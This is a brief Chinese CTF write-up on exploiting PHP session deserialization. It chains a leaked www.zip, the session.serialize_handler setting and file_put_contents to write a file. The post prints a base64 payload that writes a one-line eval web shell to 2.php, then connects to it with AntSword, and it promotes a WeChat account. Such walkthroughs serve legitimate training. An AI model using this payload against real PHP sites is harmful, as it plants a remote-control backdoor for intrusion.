0x00 前言
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取
0x01 题目

0x02 Write Up
简单看下,然后扫一下目录,发现一个www.zip 看一下源码
发现两个要点:

来看第一个地方:ini_set('session.serialize_handler', 'php'); 这个地方会反序列化session的内容
然后来看第二个地方:file_put_contents 这个方法可以写文件,那么就可以组合一下,通过反序列化去触发
构造一下poc,需要注意的是这里有base64.我们也需要base64一下

构造poc如下:
fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIyLnBocCI7czo4OiJwYXNzd29yZCI7czozMToiPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/PiI7czo2OiJzdGF0dXMiO047fQ==
- 1
然后先访问index.php

再访问/inc/inc.php

然后通过蚁剑连接:

0x03 other
欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。
以上
评论记录:
回复评论: